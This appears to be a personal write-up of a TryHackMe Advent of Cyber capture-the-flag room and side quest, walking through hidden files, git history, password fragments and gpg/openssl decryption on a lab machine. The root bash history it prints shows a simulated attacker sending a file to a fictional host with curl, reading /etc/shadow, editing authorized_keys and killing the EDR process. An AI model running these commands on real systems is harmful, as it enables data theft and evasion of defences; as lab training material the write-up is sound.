Advent of Cyber Day -1 | Side Quest -1 | Shells Bells | TryHackMe
I won't be sharing Flags for ethical reasons. You will have to follow the write-up to get them.
Initial setup
To get started, you need to start the target machine on TryHackMe and SSH into it from your VM. You can obviously use the VM you are given there, too. However, it's always better to use your own VM.
So let's get started.
The advent of Cyber Challenge
This doesn't need any write-up, as everything is already there on the website, guiding you step by step on how to solve it. Yet let me create a small, summarized write-up on how to get all the Flags, and then we will move on with the SideQuest.
First Flag
As you SSH to the system, you see a README.txt file which contains the following info:
For all TBFC members,
Yesterday I spotted yet another Eggsploit on our servers.
Not sure what it means yet, but Wareville is in danger.
To be prepared, I'll write the security guide by tomorrow.
As a precaution, I'll also hide the guide from plain view.
~ McSkidy
And along with all these files, you will see a folder named Guides get into that directory, and when you run ls command on that folder, you will get nothing. Then run ls -la and a file appears:
mcskidy@tbfc-web01:~/Guides$ ls -latotal 12
drwxrwxr-x 2 mcskidy mcskidy 4096 Oct 29 20:46 .
drwxr-x--- 21 mcskidy mcskidy 4096 Nov 13 17:10 ..
-rw-rw-r-- 1 mcskidy mcskidy 506 Oct 29 20:46 .guide.txt
Read that file:
mcskidy@tbfc-web01:~/Guides$ cat .guide.txtI think King Malhare from HopSec Island is preparing for an attack.
Not sure what his goal is, but Eggsploits on our servers are not good.
Be ready to protect Christmas by following this Linux guide:
Check /var/log/ and grep inside, let the logs become your guide.
Look for eggs that want to hide, check their shells for what's inside!
P.S. Great job finding the guide. Your flag is:
-----------------------------------------------
THM{learning-li***-***}
-----------------------------------------------Here you got your first flag.
Second Flag
It says to check the /var/log directory and grep there. After looking at auth.log you can see that there are multiple failed login attempts. So let's get into the socmas home directory:
mcskidy@tbfc-web01:/var/log$ cd /home/socmas/2025
mcskidy@tbfc-web01:/home/socmas/2025$ lseggstrike.sh index.html node_modules package.json package-lock.json secret-server.js wishlist.txt
Now let's read the eggstrike.sh file, and you will get the second Flag:
mcskidy@tbfc-web01:/home/socmas/2025$ cat eggstrike.sh # Eggstrike v0.3
# © 2025, Sir Carrotbane, HopSec
cat wishlist.txt | sort | uniq > /tmp/dump.txt
rm wishlist.txt && echo "Chistmas is fading..."
mv eastmas.txt wishlist.txt && echo "EASTMAS is invading!"
# Your flag is:
# THM{sir-carrotbane-attacks}Third Flag
Now, as per the official Guide, you need to switch to the root user:
mcskidy@tbfc-web01:/home/socmas/2025$ sudo su
root@tbfc-web01:/home/socmas/2025$ cd /root/
root@tbfc-web01:~$ ls -latotal 80
drwx------ 11 root root 4096 Nov 13 16:52 .
drwxr-xr-x 22 root root 4096 Dec 2 11:57 ..
-rw------- 1 root root 289 Dec 2 12:24 .bash_history
-rw-r--r-- 1 root root 3812 Nov 11 16:26 .bashrc
-rw-r--r-- 1 root root 3812 Oct 13 01:06 .bashrc.bak
drwxr-xr-x 5 root root 4096 Oct 8 12:30 .cache
drwx------ 3 root root 4096 Oct 3 2024 .config
drwx------ 3 root root 4096 Oct 8 12:30 .dbus
drwx------ 3 root root 4096 Oct 3 2024 .launchpadlib
drwxr-xr-x 3 root root 4096 Feb 27 2022 .local
-rw-r--r-- 1 root root 161 Nov 11 16:26 .profile
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile.bak
-rw-r--r-- 1 root root 66 Feb 27 2022 .selected_editor
drwx------ 2 root root 4096 Oct 13 01:37 .ssh
-rw------- 1 root root 10711 Nov 11 14:21 .viminfo
drwxr-xr-x 2 root root 4096 Feb 27 2022 .vnc
drwxr-xr-x 2 root root 4096 Nov 11 16:26 fix_passfrag_backups_20251111162618
drwxr-xr-x 5 root root 4096 Sep 1 2024 snap
Read the .bash_history file:
root@tbfc-web01:~$ cat .bash_history whoami
cd ~
ll
nano .ssh/authorized_keys
curl --data "@/tmp/dump.txt" http://files.hopsec.thm/upload
curl --data "%qur\(tq_` :D AH?65P" http://red.hopsec.thm/report
curl --data "THM{until-we-meet-again}" http://flag.hopsec.thm
pkill tbfcedr
cat /etc/shadow
cat /etc/hosts
exit
cd /root/
ls -laThis was the final flag.
For those who consider themself intermediate and want another challenge, check McSkidy's hidden note in /home/mcskidy/Documents/ to get access to the key for Side Quest 1!|Side Quest 1
Change your directory to the given directory in the above message run the ls -la command:
root@tbfc-web01:/home/mcskidy/Documents$ ls -latotal 12
drwxr-xr-x 2 mcskidy mcskidy 4096 Oct 29 20:48 .
drwxr-x--- 21 mcskidy mcskidy 4096 Nov 13 17:10 ..
-rw-rw-r-- 1 mcskidy mcskidy 1078 Oct 29 20:48 read-me-please.txt
Now read the file:
root@tbfc-web01:/home/mcskidy/Documents$ cat read-me-please.txt From: mcskidy
To: whoever finds this
I had a short second when no one was watching. I used it.
I've managed to plant a few clues around the account.
If you can get into the user below and look carefully,
those three little "easter eggs" will combine into a passcode
that unlocks a further message that I encrypted in the
/home/eddi_knapp/Documents/ directory.
I didn't want the wrong eyes to see it.
Access the user account:
username: eddi_knapp
password: S0mething1Sc0ming
There are three hidden easter eggs.
They combine to form the passcode to open my encrypted vault.
Clues (one for each egg):
1)
I ride with your session, not with your chest of files.
Open the little bag your shell carries when you arrive.
2)
The tree shows today; the rings remember yesterday.
Read the ledger’s older pages.
3)
When pixels sleep, their tails sometimes whisper plain words.
Listen to the tail.
Find the fragments, join them in order, and use the resulting passcode
to decrypt the message I left. Be careful — I had to be quick,
and I left only enough to get help.
~ McSkidyAlright, so we now know that we have to get 3 fragments of the password and then combine them to get the final password that will unlock some vault.
First Frag
Let's change our current user from root to eddi_knapp and go to its home directory and run ls -la command:
eddi_knapp@tbfc-web01:~$ ls -latotal 120
drwxr-x--- 18 eddi_knapp eddi_knapp 4096 Dec 1 08:52 .
drwxr-xr-x 6 root root 4096 Oct 10 17:27 ..
-rw-r--r-- 1 eddi_knapp eddi_knapp 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 eddi_knapp eddi_knapp 3797 Nov 11 16:24 .bashrc
-rw-r--r-- 1 eddi_knapp eddi_knapp 3797 Nov 11 16:19 .bashrc.bak
drwxrwxr-x 3 eddi_knapp eddi_knapp 4096 Nov 30 18:18 .cache
drwx------ 2 eddi_knapp eddi_knapp 4096 Oct 9 16:50 .config
drwx------ 3 eddi_knapp eddi_knapp 4096 Dec 1 08:32 .gnupg
-rw------- 1 eddi_knapp eddi_knapp 68 Oct 10 18:16 .image_meta
-rw------- 1 eddi_knapp eddi_knapp 20 Oct 10 10:34 .lesshst
drwxrwxr-x 4 eddi_knapp eddi_knapp 4096 Nov 30 18:18 .local
-rw------- 1 eddi_knapp eddi_knapp 19 Nov 11 16:30 .pam_environment
-rw------- 1 eddi_knapp eddi_knapp 19 Nov 11 16:24 .pam_environment.bak
-rw-r--r-- 1 eddi_knapp eddi_knapp 833 Nov 11 16:30 .profile
-rw-r--r-- 1 eddi_knapp eddi_knapp 833 Nov 11 16:24 .profile.bak
drwxrwxr-x 2 eddi_knapp eddi_knapp 4096 Dec 1 08:32 .secret
drwx------ 3 eddi_knapp eddi_knapp 4096 Nov 11 12:07 .secret_git
drwx------ 3 eddi_knapp eddi_knapp 4096 Oct 9 17:20 .secret_git.bak
-rw------- 1 eddi_knapp eddi_knapp 7167 Nov 11 16:23 .viminfo
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 10 18:15 Desktop
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Nov 14 19:31 Documents
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 10 18:15 Downloads
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 9 16:50 Music
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 10 18:16 Pictures
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 9 16:50 Public
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 9 16:50 Templates
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 9 16:50 Videos
drwxrwxr-x 2 eddi_knapp eddi_knapp 4096 Nov 11 16:24 fix_passfrag_backups_20251111162432
-rw-rw-r-- 1 eddi_knapp eddi_knapp 429 Oct 9 17:53 wget-log
When looking through the files, you see the .pam_environment file read that file: (If you are wondering what the use of that file is in Linux, then this file is used to set the environment variables for the user)
eddi_knapp@tbfc-web01:~$ cat .pam_environmentSecond Frag
PASSFRAG1="3as***"Now we have our first fragment of the password, let's hunt for the second one:
The hint for the second frag says:
The tree shows today; the rings remember yesterday.
Read the ledger’s older pages.
When reading this at first, I thought it was telling me to read the .bash_history file, but it was not there. So after a little enumeration, I got into the .secret_git directory, where I found that .git folder is still there, which means that I can see what things were there in that directory, and if there are any committed changes, I would be able to roll back to it and read them.
eddi_knapp@tbfc-web01:~/.secret_git$ git logcommit e924698378132991ee08f050251242a092c548fd (HEAD -> master)
Author: mcskiddy <[email protected]>
Date: Thu Oct 9 17:20:11 2025 +0000
remove sensitive note
commit d12875c8b62e089320880b9b7e41d6765818af3d
Author: McSkidy <[email protected]>
Date: Thu Oct 9 17:19:53 2025 +0000
add private note
And yes, we were right about this, so let's reverse these commits and try to read whatever we have there.
So, from the commit history, we know that the last commit removed the sensitive notes from the directory, so in order to read that note, we will have to roll back to the first commit.
eddi_knapp@tbfc-web01:~/.secret_git$ git checkout d12875c8b62e089320880b9b7e41d6765818af3dNote: switching to 'd12875c8b62e089320880b9b7e41d6765818af3d'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at d12875c add private note
Now we have a file named secret_note.txt, read that file:
eddi_knapp@tbfc-web01:~/.secret_git$ cat secret_note.txt ========================================
Private note from McSkidy
========================================
We hid things to buy time.
PASSFRAG2: -***
We now have the second fragment of the final password. It's time for the third fragment.
Third Frag
The hint says:
When pixels sleep, their tails sometimes whisper plain words.
Listen to the tail.
After reading this, the first thing would comes to mind is that there are some images with steganography encryption and we need to get the flag out of it.
But I was brutally wrong here…
I wasted so much of my time looking through the images and extracting data from them, and the file containing the flag was right there, but it was not some image.
First, switch your directory to Pictures directory and run the ls command:
eddi_knapp@tbfc-web01:~/Pictures$ lsbanner_01.jpg family_holiday.jpg large_photo_2.jpg office_building.png profile_pic.png scenery_01.png scuffed_2.jpg wallpaper_spring.png
banner_02.png holiday_card.jpg large_photo_3.jpg photo_meta_1.txt random_image_001.png scenery_02.jpg scuffed_3.jpg work_event.png
conference_badge.jpg kids_playground.jpg logo_asset.png photo_meta_2.txt random_image_002.jpg screenshot_2025-06-01.png vacation_beach.jpg
easter.png large_photo_1.jpg meme_asset.png photo_meta_3.txt receipt_scan.jpg scuffed_1.jpg wallpaper_autumn.png
Now, going through the files, you will think that the easter.png is the most legit candidate that should have the flag right?
I thought the same, but none of these files contains the last fragment; instead, we will have to run ls -la this will include the hidden files of that directory too.
eddi_knapp@tbfc-web01:~/Pictures$ ls -latotal 160680
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 10 18:16 .
drwxr-x--- 18 eddi_knapp eddi_knapp 4096 Dec 2 12:58 ..
-rw-rw-r-- 1 eddi_knapp eddi_knapp 1442 Oct 9 18:07 .easter_egg
-rw-r--r-- 1 eddi_knapp eddi_knapp 5871771 Aug 13 18:15 .hidden_pic_1.png
-rw-r--r-- 1 eddi_knapp eddi_knapp 5871771 Jul 20 18:15 .hidden_pic_2.png
-rw-r--r-- 1 eddi_knapp eddi_knapp 5871771 Sep 11 18:15 .hidden_pic_3.png
--------------------- SNIP ---------------------
The file named .easter_egg contains the last frag we need:
eddi_knapp@tbfc-web01:~/Pictures$ cat .easter_egg @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@%%%%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@#+==+*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%+=+*++@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@*++**+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@%%#*====+#%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@#*===-===#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@%*++:-+====*%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@%*===++++===-+*#######%%@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@%*+===+++==::-=========+*#%@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@%%#**+======-:-==--==-==+*%@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@%*+======---=+===------=#%@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@%**+=-=====-==+==-====--=*%@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@%***+++==--=====+=----=-=#@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@%#**++=--=====++====----*@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@%*+=-:=++**++**+=-::--*@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@#+=:.+#***=*#=--::-=-=%@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%%*+-:+%#+++=++=:::==--*%@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@%*+=--*@#++===::::::::=#%@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@%%%##*#%%%####***#*#####%%@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@%%###%%%%%%%%%%##%%##%%@@@@@@@@@@@@
~~ HAPPY EASTER ~~~
PASSFRAG3: c0M***
Now that we have all the fragments of the password, we can combine them to decrypt the vault in /home/eddi_knapp/Documents/.
eddi_knapp@tbfc-web01:~/Pictures$ cd /home/eddi_knapp/Documents/
eddi_knapp@tbfc-web01:~/Documents$ ls -latotal 16
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Nov 14 19:31 .
drwxr-x--- 18 eddi_knapp eddi_knapp 4096 Dec 2 12:58 ..
-rw-rw-r-- 1 eddi_knapp eddi_knapp 1004 Nov 14 19:31 mcskidy_note.txt.gpg
-rw-r--r-- 1 eddi_knapp eddi_knapp 108 Oct 10 18:15 notes_on_photos.txt
We have two files here, one is plain text, another is encrypted.
eddi_knapp@tbfc-web01:~/Documents$ cat notes_on_photos.txt Photo notes:
- backup all images weekly
- sync with phone when connected
- organize into 3 folders per yearThen I tried to extract the encrypted note, but it didn't work:
gpg: AES256.CFB encrypted data
gpg: problem with the agent: Permission denied
gpg: encrypted with 1 passphrase
gpg: decryption failed: Bad session key
Since we already had root user access, we can use that account to decrypt the file, I guess:
root@tbfc-web01:/home/eddi_knapp/Documents$ gpg -d mcskidy_note.txt.gpg
┌──────────────────────────────────────────────────────┐
│ Please enter the passphrase for decryption. │
│ │
│ Passphrase: ________________________________________ │
│ │
│ <OK> <Cancel> │
└──────────────────────────────────────────────────────┘
You will be prompted to enter the password: combine all the fragments we collected so far; it will serve as the password here.
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
Congrats — you found all fragments and reached this file.
Below is the list that should be live on the site. If you replace the contents of
/home/socmas/2025/wishlist.txt with this exact list (one item per line, no numbering),
the site will recognise it and the takeover glitching will stop. Do it — it will save the site.
Hardware security keys (YubiKey or similar)
Commercial password manager subscriptions (team seats)
Endpoint detection & response (EDR) licenses
Secure remote access appliances (jump boxes)
Cloud workload scanning credits (container/image scanning)
Threat intelligence feed subscription
Secure code review / SAST tool access
Dedicated secure test lab VM pool
Incident response runbook templates and playbooks
Electronic safe drive with encrypted backups
A final note — I don't know exactly where they have me, but there are *lots* of eggs
and I can smell chocolate in the air. Something big is coming. — McSkidy
---
When the wishlist is corrected, the site will show a block of ciphertext. This ciphertext can be decrypted with the following unlock key:
UNLOCK_KEY: 91J6X7R4FQ9TQ************
To decode the ciphertext, use OpenSSL. For instance, if you copied the ciphertext into a file /tmp/website_output.txt you could decode using the following command:
cat > /tmp/website_output.txt
openssl enc -d -aes-256-cbc -pbkdf2 -iter 200000 -salt -base64 -in /tmp/website_output.txt -out /tmp/decoded_message.txt -pass pass:'91J6X7R4FQ9TQ**********'
cat /tmp/decoded_message.txt
Sorry to be so convoluted, I couldn't risk making this easy while King Malhare watches. — McSkidy
Alright, now we know what to do, let's get it done:
root@tbfc-web01:/home/eddi_knapp/Documents$ sudo nano /home/socmas/2025/wishlist.txt Replace the text there with the paragraph we got from above, make sure to remove the space that is between both paragraphs, otherwise it won't work.
Now open Firefox and go to http://ip_address:8080 you will get a long encrypted string at the bottom of the website. Copy that string to a file. I will name that file cipher.txt
root@tbfc-web01:/home/eddi_knapp/Documents$ sudo nano cipher.txt
root@tbfc-web01:/home/eddi_knapp/Documents$ openssl enc -d -aes-256-cbc -pbkdf2 -iter 200000 -salt -base64 -in cipher.txt -out message.txt -pass pass:'91J6X7R4FQ9TQ********'
root@tbfc-web01:/home/eddi_knapp/Documents$ cat message.txt Well done — the glitch is fixed. Amazing job going the extra mile and saving the site. Take this flag THM{w3lcome_2_***_****}
NEXT STEP:
If you fancy something a little...spicier....use the FLAG you just obtained as the passphrase to unlock:
/home/eddi_knapp/.secret/dir
That hidden directory has been archived and encrypted with the FLAG.
Inside it you'll find the sidequest key.
Here we go, another flag with yet another task to complete. Let's get this done, too.
root@tbfc-web01:/home/eddi_knapp/Documents$ gpg -d /home/eddi_knapp/.secret/dir.tar.gz.gpg > dir.tar.gzgpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
Extracting the decoded folder:
root@tbfc-web01:/home/eddi_knapp/Documents$ tar -xzf dir.tar.gz
root@tbfc-web01:/home/eddi_knapp/Documents$ ls -la
total 440
drwxr-xr-x 3 eddi_knapp eddi_knapp 4096 Dec 2 14:28 .
drwxr-x--- 18 eddi_knapp eddi_knapp 4096 Dec 2 14:05 ..
-rw-r--r-- 1 root root 557 Dec 2 14:22 cipher.txt
drwxrwxr-x 2 eddi_knapp eddi_knapp 4096 Dec 1 08:25 dir
-rw-r--r-- 1 root root 419499 Dec 2 14:27 dir.tar.gz
-rw-rw-r-- 1 eddi_knapp eddi_knapp 1004 Nov 14 19:31 mcskidy_note.txt.gpg
-rw-r--r-- 1 root root 385 Dec 2 14:23 message.txt
-rw-r--r-- 1 eddi_knapp eddi_knapp 108 Oct 10 18:15 notes_on_photos.txt
We got a directory named dir. Get into the dir and list the files:
root@tbfc-web01:/home/eddi_knapp/Documents/dir$ cd dir; ls -labash: cd: dir: No such file or directory
total 420
drwxrwxr-x 2 eddi_knapp eddi_knapp 4096 Dec 1 08:25 .
drwxr-xr-x 3 eddi_knapp eddi_knapp 4096 Dec 2 14:28 ..
-rw-r--r-- 1 eddi_knapp eddi_knapp 420812 Nov 30 18:18 sq1.png
An image file. Great, this is the end of Side Quest 1. We got all the flags, and I hope it was equally fun for you as it was for me. See you in the next write-up.
HAPPY HACKING
